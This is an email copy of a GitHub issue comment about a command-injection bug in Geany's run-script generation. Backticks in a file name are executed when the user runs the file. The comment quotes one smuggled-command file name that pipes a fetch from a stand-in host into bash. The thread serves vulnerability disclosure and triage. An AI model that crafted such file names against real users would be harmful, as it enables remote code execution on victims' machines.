CVE-Hunter-Leo left a comment (geany/geany#4611)

@WrapEarnPass Thanks for testing this and for the detailed feedback.

You're right that a literal `/` cannot appear in a filename on Linux. The `/` 
in my original example was inside the backtick command (i.e. part of the 
payload), not a character in the filename itself. Filenames containing 
backticks (`` ` ``), `$()`, `;`, `|`, etc. are perfectly valid on Linux/macOS.

Your modified test case (`test`curl evil.example|bash`.c`) confirms the core 
issue — command substitution still occurs in the generated 
`geany_run_script_*.sh`, which is exactly the problem being reported.

I also appreciate you capturing the actual shell script output. It clearly 
shows the backtick expression being executed by the shell.

Regarding CVSS:
- I had initially scored it as 7.8 (Critical) because arbitrary command 
execution is possible with a very common user action (pressing F5/Execute on a 
file received from someone else).
- Your scoring of ~6.1 is reasonable if we consider the attack requires the 
victim to open and explicitly run the file. I'm happy to go with whatever the 
maintainers decide.

On the geany-plugins point — thank you for raising it. If the same unsafe 
substitution pattern exists in plugins (geanyctags, lsp, etc.), it would be 
good to track those separately so they don't get overlooked.

I'm happy to provide more details,  or adjust the issue description if needed. 
Just let me know how you'd like to proceed.

-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany/issues/4611#issuecomment-4846041794
You are receiving this because you are subscribed to this thread.

Message ID: <geany/geany/issues/4611/[email protected]>

Reply via email to